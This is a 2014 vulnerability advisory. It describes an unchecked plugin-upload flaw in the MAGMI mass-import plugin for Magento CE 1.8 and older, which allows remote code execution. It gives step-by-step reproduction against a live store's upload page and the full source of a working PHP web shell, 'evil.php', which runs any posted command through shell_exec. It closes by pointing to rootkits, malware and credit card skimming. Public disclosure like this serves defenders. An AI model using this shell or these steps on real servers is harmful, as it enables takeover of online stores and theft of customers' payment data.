Exploit found date: 10/24/2014
Security Researcher name: Parvinder Bhasin
Contact info: parvinder.bhasin@gmail.com
twitter: @parvinderb - scorpio
Currently tested version:
Magento version: Magento CE - 1.8 older
MAGMI version: v0.7.17a older
Download software link:
Magento server: http://www.magentocommerce.com/download
MAGMI Plugin:
https://sourceforge.net/projects/magmi/files/magmi-0.7/plugins/packages/
MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability
(RFI) which allows an attacker to upload essentially any PHP file (without
any sanity checks). This PHP file could then be used to skim credit card
data, rewrite files, run remote commands, delete files..etc. Essentially,
this gives attacker ability to execute remote commands on the vulnerable
server.
Steps to reproduce:
1. http://<a magentosite.com>/magmi/web/magmi.php
2. Under upload new plugins:
click on "choose file"
MAGento plugins are basically php file zipped. So create a php shell and
zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file
has been uploaded, it will say: Plugin packaged installed.
evil.php:
<?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
if(function_exists('shell_exec')) {
$command=$_POST['command'];
$output = shell_exec("$command");
echo "<pre>$output</pre>";
}
}
else {
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
}
?>
3. Your malicious evil.php file is extracted now. All you then need to do
is just access the evil.php page from:
http://<amagentosite.com>/magmi/plugins/evil.php
At this point you could really have access to the entire system. Download
any malware, install rootkits, skim credit card data ..etc.etc.
